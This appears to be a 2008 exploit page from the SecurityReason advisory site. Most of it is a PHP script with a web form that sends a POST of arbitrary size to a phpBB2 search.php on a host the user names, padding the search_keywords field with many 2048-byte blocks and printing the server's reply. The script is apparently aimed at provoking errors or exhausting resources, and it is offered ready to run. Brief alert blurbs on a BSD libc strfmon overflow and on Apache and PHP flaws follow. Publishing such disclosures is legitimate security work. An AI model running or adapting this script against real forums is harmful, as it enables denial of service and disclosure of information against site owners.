|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityReason Exploit |
 Exploit Code : <? # # phpBB2018 examples errors # SecurityReason.Com (Maksymilian Arciemowicz) # cxib [at] securityreason [dot] com # http://securityreason.com/key/Arciemowicz.Maksymilian.gpg # if(isset($_POST['HOST']) AND isset($_POST['CAT']) AND isset($_POST['ILE'])){ $POSTx="SecurityReasonComSecurityReasonComSecurityReasonComSecurityReaso nComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCom SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecu rityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurity ReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReas onComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCo mSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSec urityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurit yReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRea sonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonC omSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSe curityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecuri tyReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRe asonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReason ComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComS ecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecur ityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityR easonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReaso nComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCom SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecu rityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurity ReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReas onComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonCo mSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSec urityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurit yReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityRea sonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonC omSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSe curityReasonComSecurityReasonComSecurity"; # 2048b $POST = "mode=results&search_keywords="; for($x=1; $x<=$_POST['ILE']; $x++){ $POST .= $POSTx; # f(x)=x * 2048b } $sock = fsockopen($_POST['HOST'], 80); if (!$sock) {return false;} $out = "POST ".$_POST['CAT']."search.php HTTP/1.1\r\n"; $out .= "Host: ".$_POST['HOST']."\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\n"; $out .= "Content-Length: ".strlen($POST)."\n\n"; $out .= $POST."\r\n"; fwrite($sock, $out); $data=""; while(!feof($sock)) { $data .= fread($sock,4096); } fclose($sock); $data = substr($data, strpos($data,"\r\n\r\n")+4); echo $data; } else { echo "<CENTER> <A HREF=\"http://securityreason.com\"><IMG SRC=\"http://securityreason.com/gfx/small_log o.png\"></A><P> <FORM action=\"\" method=post enctype=\"multipart/form-data\"> HOST: <input TYPE=\"text\" name=\"HOST\"> Like www.securityreason.com<br> CATALOG: <input TYPE=\"text\" name=\"CAT\"> Like: /phpBB2/<br> f(x)= <input TYPE=\"text\" name=\"ILE\" value=\"512\"> x 2048b (example 512 x 2048)<br> <input TYPE=\"submit\" value=\"Send\"> </FORM>"; } ?> |
| Alert | ||
*BSD libc (strfmon) Multiple vulnerabilities
Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems. |
||
| Apache |  |
|
» Apache (mod_status) |
||
» Apache (mod_proxy_ftp) |
||
| PHP | |
|
» PHP 5.2.5 and prior : |
||
- 2008-03-25| Copyright © SecurityReason. All Rights Reserved. |